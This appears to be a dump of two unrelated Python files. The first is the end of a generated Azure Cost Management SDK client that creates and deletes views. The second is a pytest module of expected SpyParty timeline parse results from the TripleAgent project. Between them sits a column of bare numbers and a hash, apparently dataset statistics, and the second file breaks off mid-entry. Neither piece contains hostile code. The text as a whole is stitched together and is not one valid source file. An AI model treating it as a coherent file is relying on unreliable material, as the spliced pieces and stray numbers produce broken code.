:type accumulated: str or ~azure.mgmt.costmanagement.models.AccumulatedType
:param metric: Metric to use when displaying costs.
:type metric: str or ~azure.mgmt.costmanagement.models.MetricType
:param kpis: List of KPIs to show in Cost Analysis UI.
:type kpis: list[~azure.mgmt.costmanagement.models.KpiProperties]
:param pivots: Configuration of 3 sub-views in the Cost Analysis UI.
:type pivots: list[~azure.mgmt.costmanagement.models.PivotProperties]
:param timeframe: The time frame for pulling data for the report. If custom, then a specific
time period must be provided.
:type timeframe: str or ~azure.mgmt.costmanagement.models.ReportTimeframeType
:param time_period: Has time period for pulling data for the report.
:type time_period: ~azure.mgmt.costmanagement.models.ReportConfigTimePeriod
:param dataset: Has definition for data in this report config.
:type dataset: ~azure.mgmt.costmanagement.models.ReportConfigDataset
:keyword callable cls: A custom type or function that will be passed the direct response
:return: View or the result of cls(response)
:rtype: ~azure.mgmt.costmanagement.models.View or ~azure.mgmt.costmanagement.models.View
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.View"]
error_map = kwargs.pop('error_map', {404: ResourceNotFoundError, 409: ResourceExistsError})
_parameters = models.View(e_tag=e_tag, display_name=display_name, scope=view_properties_scope, chart=chart, accumulated=accumulated, metric=metric, kpis=kpis, pivots=pivots, timeframe=timeframe, time_period=time_period, dataset=dataset)
api_version = "2019-11-01"
content_type = kwargs.pop("content_type", "application/json")
# Construct URL
url = self.create_or_update_by_scope.metadata['url']
path_format_arguments = {
'scope': self._serialize.url("scope", scope, 'str'),
'viewName': self._serialize.url("view_name", view_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = 'application/json'
# Construct and send request
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(_parameters, 'View')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('View', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('View', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_or_update_by_scope.metadata = {'url': '/{scope}/providers/Microsoft.CostManagement/views/{viewName}'}
def delete_by_scope(
self,
scope, # type: str
view_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
"""The operation to delete a view.
:param scope: The scope associated with view operations. This includes
'subscriptions/{subscriptionId}' for subscription scope,
'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}' for resourceGroup scope,
'providers/Microsoft.Billing/billingAccounts/{billingAccountId}' for Billing Account scope,
'providers/Microsoft.Billing/billingAccounts/{billingAccountId}/departments/{departmentId}' for
Department scope,
'providers/Microsoft.Billing/billingAccounts/{billingAccountId}/enrollmentAccounts/{enrollmentAccountId}'
for EnrollmentAccount scope,
'providers/Microsoft.Billing/billingAccounts/{billingAccountId}/billingProfiles/{billingProfileId}'
for BillingProfile scope,
'providers/Microsoft.Billing/billingAccounts/{billingAccountId}/invoiceSections/{invoiceSectionId}'
for InvoiceSection scope, 'providers/Microsoft.Management/managementGroups/{managementGroupId}'
for Management Group scope,
'providers/Microsoft.CostManagement/externalBillingAccounts/{externalBillingAccountName}' for
External Billing Account scope and
'providers/Microsoft.CostManagement/externalSubscriptions/{externalSubscriptionName}' for
External Subscription scope.
:type scope: str
:param view_name: View name.
:type view_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = kwargs.pop('error_map', {404: ResourceNotFoundError, 409: ResourceExistsError})
api_version = "2019-11-01"
# Construct URL
url = self.delete_by_scope.metadata['url']
path_format_arguments = {
'scope': self._serialize.url("scope", scope, 'str'),
'viewName': self._serialize.url("view_name", view_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete_by_scope.metadata = {'url': '/{scope}/providers/Microsoft.CostManagement/views/{viewName}'}
| 50.609971
| 244
| 0.68067
| 3,632
| 34,516
| 6.33728
| 0.082048
| 0.043794
| 0.045966
| 0.039102
| 0.934744
| 0.934309
| 0.931529
| 0.930703
| 0.925099
| 0.914498
| 0
| 0.006052
| 0.219724
| 34,516
| 681
| 245
| 50.684288
| 0.848582
| 0.473635
| 0
| 0.821656
| 0
| 0
| 0.081636
| 0.025972
| 0
| 0
| 0
| 0
| 0
| 1
| 0.047771
| false
| 0
| 0.028662
| 0
| 0.140127
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bf30dd287dac5c72b954c133feb32342f600ed86
| 254,716
|
py
|
Python
|
triple_agent/tests/test_parse_timeline.py
|
andrewzwicky/TripleAgent
|
8d056df5c53a3d264dc778bad6771a0a2f62e7e7
|
[
"MIT"
] | 3
|
2020-04-25T11:42:03.000Z
|
2020-07-08T16:38:26.000Z
|
triple_agent/tests/test_parse_timeline.py
|
andrewzwicky/TripleAgent
|
8d056df5c53a3d264dc778bad6771a0a2f62e7e7
|
[
"MIT"
] | 17
|
2019-08-11T19:09:55.000Z
|
2021-03-30T17:12:28.000Z
|
triple_agent/tests/test_parse_timeline.py
|
andrewzwicky/TripleAgent
|
8d056df5c53a3d264dc778bad6771a0a2f62e7e7
|
[
"MIT"
] | null | null | null |
from pathlib import Path
from typing import List, Tuple, Optional
import cv2
import pytest
from triple_agent.parsing.timeline.parse_timeline import (
parse_screenshot,
find_overlap_last_page_index,
trim_overlapped_list,
)
from triple_agent.classes.action_tests import ActionTest
from triple_agent.classes.books import Books
from triple_agent.classes.characters import Characters
from triple_agent.classes.missions import Missions
from triple_agent.classes.roles import Roles
from triple_agent.classes.timeline import TimelineCategory
SCREENSHOT_TEST_CASES = [
(
"671152956268014896",
[
(
"spy",
"00:37.5",
"waiter stopped offering drink.",
(Characters.Taft,),
(00 * 60 + 37.5),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:35.5",
"spy leaves conversation.",
(None,),
(00 * 60 + 35.5),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:31.3",
"spy enters conversation.",
(None,),
(00 * 60 + 31.3),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:31.3",
"spy joined conversation with double agent.",
(Characters.Salmon,),
(00 * 60 + 31.3),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:25.1",
"guest list purloined.",
(Characters.Duke,),
(00 * 60 + 25.1),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.MissionComplete,
Missions.Purloin,
ActionTest.NoAT,
),
(
"spy",
"00:24.1",
"action triggered: contact double agent",
(None,),
(00 * 60 + 24.1),
None,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Contact,
ActionTest.NoAT,
),
(
"spy",
"00:24.1",
"real banana bread started.",
(None,),
(00 * 60 + 24.1),
None,
(None,),
(None,),
TimelineCategory.BananaBread,
Missions.Contact,
ActionTest.NoAT,
),
(
"spy",
"00:23.4",
"action test red: contact double agent",
(None,),
(00 * 60 + 23.4),
None,
(None,),
(None,),
TimelineCategory.ActionTest,
Missions.Contact,
ActionTest.Red,
),
(
"spy",
"00:19.1",
"banana bread uttered.",
(None,),
(00 * 60 + 19.1),
None,
(None,),
(None,),
TimelineCategory.BananaBread,
Missions.Contact,
ActionTest.NoAT,
),
(
"spy",
"00:18.1",
"double agent contacted.",
(Characters.Salmon,),
(00 * 60 + 18.1),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.MissionComplete,
Missions.Contact,
ActionTest.NoAT,
),
(
"spy",
"00:08.9",
"45 seconds added to match.",
(None,),
(00 * 60 + 08.9),
None,
(None,),
(None,),
TimelineCategory.TimeAdd,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:50.7",
"spy leaves conversation.",
(None,),
(00 * 60 + 50.7),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:50.7",
"spy left conversation with double agent.",
(Characters.Salmon,),
(00 * 60 + 50.7),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:50.5",
"spy enters conversation.",
(None,),
(00 * 60 + 50.5),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:50.5",
"spy joined conversation with double agent.",
(Characters.Salmon,),
(00 * 60 + 50.5),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:49.2",
"spy picks up briefcase.",
(None,),
(00 * 60 + 49.2),
None,
(None,),
(None,),
TimelineCategory.Briefcase,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:49.2",
"picked up fingerprintable briefcase.",
(None,),
(00 * 60 + 49.2),
None,
(None,),
(None,),
TimelineCategory.Briefcase,
Missions.Fingerprint,
ActionTest.NoAT,
),
(
"spy",
"00:47.6",
"spy leaves conversation.",
(None,),
(00 * 60 + 47.6),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:47.6",
"spy left conversation with double agent.",
(Characters.Salmon,),
(00 * 60 + 47.6),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:47.3",
"spy enters conversation.",
(None,),
(00 * 60 + 47.3),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:47.3",
"spy joined conversation with double agent.",
(Characters.Salmon,),
(00 * 60 + 47.3),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:45.2",
"action triggered: fingerprint ambassador",
(None,),
(00 * 60 + 45.2),
None,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Fingerprint,
ActionTest.NoAT,
),
(
"spy",
"00:45.2",
"started fingerprinting briefcase.",
(None,),
(00 * 60 + 45.2),
None,
(None,),
(None,),
TimelineCategory.Briefcase,
Missions.Fingerprint,
ActionTest.NoAT,
),
(
"spy",
"00:44.3",
"fingerprinted briefcase.",
(None,),
(00 * 60 + 44.3),
None,
(None,),
(None,),
TimelineCategory.MissionPartial | TimelineCategory.Briefcase,
Missions.Fingerprint,
ActionTest.NoAT,
),
(
"spy",
"00:42.8",
"spy returns briefcase.",
(None,),
(00 * 60 + 42.8),
None,
(None,),
(None,),
TimelineCategory.Briefcase,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:41.1",
"45 seconds added to match.",
(None,),
(00 * 60 + 41.1),
None,
(None,),
(None,),
TimelineCategory.TimeAdd,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:25.9",
"45 seconds added to match.",
(None,),
(1 * 60 + 25.9),
None,
(None,),
(None,),
TimelineCategory.TimeAdd,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:10.8",
"45 seconds added to match.",
(None,),
(2 * 60 + 10.8),
None,
(None,),
(None,),
TimelineCategory.TimeAdd,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:53.7",
"spy leaves conversation.",
(None,),
(2 * 60 + 53.7),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:53.7",
"spy left conversation with double agent.",
(Characters.Salmon,),
(2 * 60 + 53.7),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
],
),
(
"1572372555002699956",
[
(
"game",
"03:15.0",
"game started.",
(None,),
(3 * 60 + 15.0),
None,
(None,),
(None,),
TimelineCategory.GameStart,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"03:14.2",
"marked less suspicious.",
(Characters.Duke,),
(3 * 60 + 14.2),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:13.5",
"spy player takes control from ai.",
(None,),
(3 * 60 + 13.5),
None,
(None,),
(None,),
TimelineCategory.NoCategory,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:12.8",
"action triggered: bug ambassador",
(None,),
(3 * 60 + 12.8),
None,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Bug,
ActionTest.NoAT,
),
(
"spy",
"03:12.8",
"begin planting bug while walking.",
(Characters.Taft,),
(3 * 60 + 12.8),
None,
(Roles.Ambassador,),
(None,),
TimelineCategory.NoCategory,
Missions.Bug,
ActionTest.NoAT,
),
(
"sniper",
"03:12.0",
"marked less suspicious.",
(Characters.Carlos,),
(3 * 60 + 12.0),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:11.8",
"failed planting bug while walking.",
(Characters.Taft,),
(3 * 60 + 11.8),
None,
(Roles.Ambassador,),
(None,),
TimelineCategory.NoCategory,
Missions.Bug,
ActionTest.NoAT,
),
(
"sniper",
"03:09.6",
"marked suspicious.",
(Characters.Sikh,),
(3 * 60 + 09.6),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:07.1",
"spy enters conversation.",
(None,),
(3 * 60 + 07.1),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:07.1",
"spy joined conversation with double agent.",
(Characters.Carlos,),
(3 * 60 + 07.1),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:02.0",
"action triggered: contact double agent",
(None,),
(3 * 60 + 02.0),
None,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Contact,
ActionTest.NoAT,
),
(
"spy",
"03:02.0",
"real banana bread started.",
(None,),
(3 * 60 + 02.0),
None,
(None,),
(None,),
TimelineCategory.BananaBread,
Missions.Contact,
ActionTest.NoAT,
),
(
"spy",
"03:01.3",
"action test green: contact double agent",
(None,),
(3 * 60 + 01.3),
None,
(None,),
(None,),
TimelineCategory.ActionTest,
Missions.Contact,
ActionTest.Green,
),
(
"spy",
"03:01.3",
"banana bread uttered.",
(None,),
(3 * 60 + 01.3),
None,
(None,),
(None,),
TimelineCategory.BananaBread,
Missions.Contact,
ActionTest.NoAT,
),
(
"spy",
"03:00.8",
"double agent contacted.",
(Characters.Carlos,),
(3 * 60 + 00.8),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.MissionComplete,
Missions.Contact,
ActionTest.NoAT,
),
(
"spy",
"03:00.3",
"spy leaves conversation.",
(None,),
(3 * 60 + 00.3),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:00.3",
"spy left conversation with double agent.",
(Characters.Carlos,),
(3 * 60 + 00.3),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"02:59.9",
"marked less suspicious.",
(Characters.Oprah,),
(2 * 60 + 59.9),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"02:59.4",
"marked less suspicious.",
(Characters.Smallman,),
(2 * 60 + 59.4),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"02:55.5",
"marked less suspicious.",
(Characters.Rocker,),
(2 * 60 + 55.5),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"02:54.6",
"marked neutral suspicion.",
(Characters.Sikh,),
(2 * 60 + 54.6),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"02:54.5",
"marked less suspicious.",
(Characters.Sikh,),
(2 * 60 + 54.5),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:53.2",
"spy enters conversation.",
(None,),
(2 * 60 + 53.2),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:49.1",
"took last sip of drink.",
(Characters.Alice,),
(2 * 60 + 49.1),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:44.3",
"spy leaves conversation.",
(None,),
(2 * 60 + 44.3),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:40.2",
"picked up statue.",
(None,),
(2 * 60 + 40.2),
None,
(None,),
(None,),
TimelineCategory.Statues,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:37.1",
"action triggered: inspect statues",
(None,),
(2 * 60 + 37.1),
None,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.ActionTriggered,
Missions.Inspect,
ActionTest.NoAT,
),
(
"spy",
"02:36.4",
"action test white: inspect statues",
(None,),
(2 * 60 + 36.4),
None,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.ActionTest,
Missions.Inspect,
ActionTest.White,
),
(
"spy",
"02:32.1",
"left statue inspected.",
(None,),
(2 * 60 + 32.1),
None,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.MissionPartial,
Missions.Inspect,
ActionTest.NoAT,
),
(
"spy",
"02:31.8",
"action triggered: inspect statues",
(None,),
(2 * 60 + 31.8),
None,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.ActionTriggered,
Missions.Inspect,
ActionTest.NoAT,
),
],
),
(
"3759441015284876045",
[
(
"spy",
"03:30.0",
"spy cast.",
(Characters.Taft,),
(3 * 60 + 30.0),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:30.0",
"ambassador cast.",
(Characters.Morgan,),
(3 * 60 + 30.0),
None,
(Roles.Ambassador,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:30.0",
"double agent cast.",
(Characters.Salmon,),
(3 * 60 + 30.0),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:30.0",
"suspected double agent cast.",
(Characters.Duke,),
(3 * 60 + 30.0),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:30.0",
"seduction target cast.",
(Characters.Queen,),
(3 * 60 + 30.0),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:30.0",
"civilian cast.",
(Characters.Alice,),
(3 * 60 + 30.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:30.0",
"civilian cast.",
(Characters.Teal,),
(3 * 60 + 30.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:30.0",
"civilian cast.",
(Characters.Boots,),
(3 * 60 + 30.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:30.0",
"civilian cast.",
(Characters.Irish,),
(3 * 60 + 30.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:30.0",
"civilian cast.",
(Characters.Plain,),
(3 * 60 + 30.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:30.0",
"civilian cast.",
(Characters.Disney,),
(3 * 60 + 30.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:30.0",
"civilian cast.",
(Characters.Smallman,),
(3 * 60 + 30.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:30.0",
"civilian cast.",
(Characters.Bling,),
(3 * 60 + 30.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:30.0",
"civilian cast.",
(Characters.Sikh,),
(3 * 60 + 30.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:30.0",
"civilian cast.",
(Characters.General,),
(3 * 60 + 30.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:30.0",
"bug ambassador selected.",
(None,),
(3 * 60 + 30.0),
None,
(None,),
(None,),
TimelineCategory.MissionSelected,
Missions.Bug,
ActionTest.NoAT,
),
(
"spy",
"03:30.0",
"contact double agent selected.",
(None,),
(3 * 60 + 30.0),
None,
(None,),
(None,),
TimelineCategory.MissionSelected,
Missions.Contact,
ActionTest.NoAT,
),
(
"spy",
"03:30.0",
"transfer microfilm selected.",
(None,),
(3 * 60 + 30.0),
None,
(None,),
(None,),
TimelineCategory.MissionSelected,
Missions.Transfer,
ActionTest.NoAT,
),
(
"spy",
"03:30.0",
"swap statue selected.",
(None,),
(3 * 60 + 30.0),
None,
(None,),
(None,),
TimelineCategory.MissionSelected,
Missions.Swap,
ActionTest.NoAT,
),
(
"spy",
"03:30.0",
"inspect 3 statues selected.",
(None,),
(3 * 60 + 30.0),
None,
(None,),
(None,),
TimelineCategory.MissionSelected,
Missions.Inspect,
ActionTest.NoAT,
),
(
"spy",
"03:30.0",
"seduce target selected.",
(None,),
(3 * 60 + 30.0),
None,
(None,),
(None,),
TimelineCategory.MissionSelected,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"03:30.0",
"purloin guest list selected.",
(None,),
(3 * 60 + 30.0),
None,
(None,),
(None,),
TimelineCategory.MissionSelected,
Missions.Purloin,
ActionTest.NoAT,
),
(
"spy",
"03:30.0",
"fingerprint ambassador selected.",
(None,),
(3 * 60 + 30.0),
None,
(None,),
(None,),
TimelineCategory.MissionSelected,
Missions.Fingerprint,
ActionTest.NoAT,
),
(
"spy",
"03:30.0",
"bug ambassador enabled.",
(None,),
(3 * 60 + 30.0),
None,
(None,),
(None,),
TimelineCategory.MissionEnabled,
Missions.Bug,
ActionTest.NoAT,
),
(
"spy",
"03:30.0",
"contact double agent enabled.",
(None,),
(3 * 60 + 30.0),
None,
(None,),
(None,),
TimelineCategory.MissionEnabled,
Missions.Contact,
ActionTest.NoAT,
),
(
"spy",
"03:30.0",
"transfer microfilm enabled.",
(None,),
(3 * 60 + 30.0),
None,
(None,),
(None,),
TimelineCategory.MissionEnabled,
Missions.Transfer,
ActionTest.NoAT,
),
(
"spy",
"03:30.0",
"swap statue enabled.",
(None,),
(3 * 60 + 30.0),
None,
(None,),
(None,),
TimelineCategory.MissionEnabled,
Missions.Swap,
ActionTest.NoAT,
),
(
"spy",
"03:30.0",
"inspect 3 statues enabled.",
(None,),
(3 * 60 + 30.0),
None,
(None,),
(None,),
TimelineCategory.MissionEnabled,
Missions.Inspect,
ActionTest.NoAT,
),
(
"spy",
"03:30.0",
"seduce target enabled.",
(None,),
(3 * 60 + 30.0),
None,
(None,),
(None,),
TimelineCategory.MissionEnabled,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"03:30.0",
"purloin guest list enabled.",
(None,),
(3 * 60 + 30.0),
None,
(None,),
(None,),
TimelineCategory.MissionEnabled,
Missions.Purloin,
ActionTest.NoAT,
),
],
),
(
"6173092994452987597",
[
(
"spy",
"03:30.0",
"fingerprint ambassador enabled.",
(None,),
(3 * 60 + 30.0),
None,
(None,),
(None,),
TimelineCategory.MissionEnabled,
Missions.Fingerprint,
ActionTest.NoAT,
),
(
"game",
"03:30.0",
"game started.",
(None,),
(3 * 60 + 30.0),
None,
(None,),
(None,),
TimelineCategory.GameStart,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:28.9",
"spy player takes control from ai.",
(None,),
(3 * 60 + 28.9),
None,
(None,),
(None,),
TimelineCategory.NoCategory,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:22.8",
"took last sip of drink.",
(Characters.Taft,),
(3 * 60 + 22.8),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:16.8",
"get book from bookcase.",
(None,),
(3 * 60 + 16.8),
None,
(None,),
(Books.Blue,),
TimelineCategory.Books,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:14.3",
"action triggered: transfer microfilm",
(None,),
(3 * 60 + 14.3),
None,
(None,),
(None,),
TimelineCategory.Books | TimelineCategory.ActionTriggered,
Missions.Transfer,
ActionTest.NoAT,
),
(
"spy",
"03:13.6",
"action test white: transfer microfilm",
(None,),
(3 * 60 + 13.6),
None,
(None,),
(None,),
TimelineCategory.Books | TimelineCategory.ActionTest,
Missions.Transfer,
ActionTest.White,
),
(
"spy",
"03:10.7",
"remove microfilm from book.",
(None,),
(3 * 60 + 10.7),
None,
(None,),
(Books.Blue, Books.Blue),
TimelineCategory.Books | TimelineCategory.MissionPartial,
Missions.Transfer,
ActionTest.NoAT,
),
(
"spy",
"03:09.1",
"action triggered: transfer microfilm",
(None,),
(3 * 60 + 09.1),
None,
(None,),
(None,),
TimelineCategory.Books | TimelineCategory.ActionTriggered,
Missions.Transfer,
ActionTest.NoAT,
),
(
"spy",
"03:08.1",
"action test green: transfer microfilm",
(None,),
(3 * 60 + 08.1),
None,
(None,),
(None,),
TimelineCategory.Books | TimelineCategory.ActionTest,
Missions.Transfer,
ActionTest.Green,
),
(
"spy",
"03:05.4",
"hide microfilm in book.",
(None,),
(3 * 60 + 05.4),
None,
(None,),
(Books.Blue, Books.Blue),
TimelineCategory.Books | TimelineCategory.MissionPartial,
Missions.Transfer,
ActionTest.NoAT,
),
(
"spy",
"02:53.6",
"put book in bookcase.",
(None,),
(2 * 60 + 53.6),
None,
(None,),
(Books.Blue, Books.Green),
TimelineCategory.Books,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:53.6",
"transferred microfilm.",
(None,),
(2 * 60 + 53.6),
None,
(None,),
(Books.Blue, Books.Green),
TimelineCategory.Books | TimelineCategory.MissionComplete,
Missions.Transfer,
ActionTest.NoAT,
),
(
"spy",
"02:51.7",
"request drink from waiter.",
(Characters.Taft,),
(2 * 60 + 51.7),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:45.3",
"spy picks up briefcase.",
(None,),
(2 * 60 + 45.3),
None,
(None,),
(None,),
TimelineCategory.Briefcase,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:45.3",
"picked up fingerprintable briefcase (difficult).",
(None,),
(2 * 60 + 45.3),
None,
(None,),
(None,),
TimelineCategory.Briefcase,
Missions.Fingerprint,
ActionTest.NoAT,
),
(
"spy",
"02:41.6",
"action triggered: fingerprint ambassador",
(None,),
(2 * 60 + 41.6),
None,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Fingerprint,
ActionTest.NoAT,
),
(
"spy",
"02:41.6",
"started fingerprinting briefcase.",
(None,),
(2 * 60 + 41.6),
None,
(None,),
(None,),
TimelineCategory.Briefcase,
Missions.Fingerprint,
ActionTest.NoAT,
),
(
"spy",
"02:40.6",
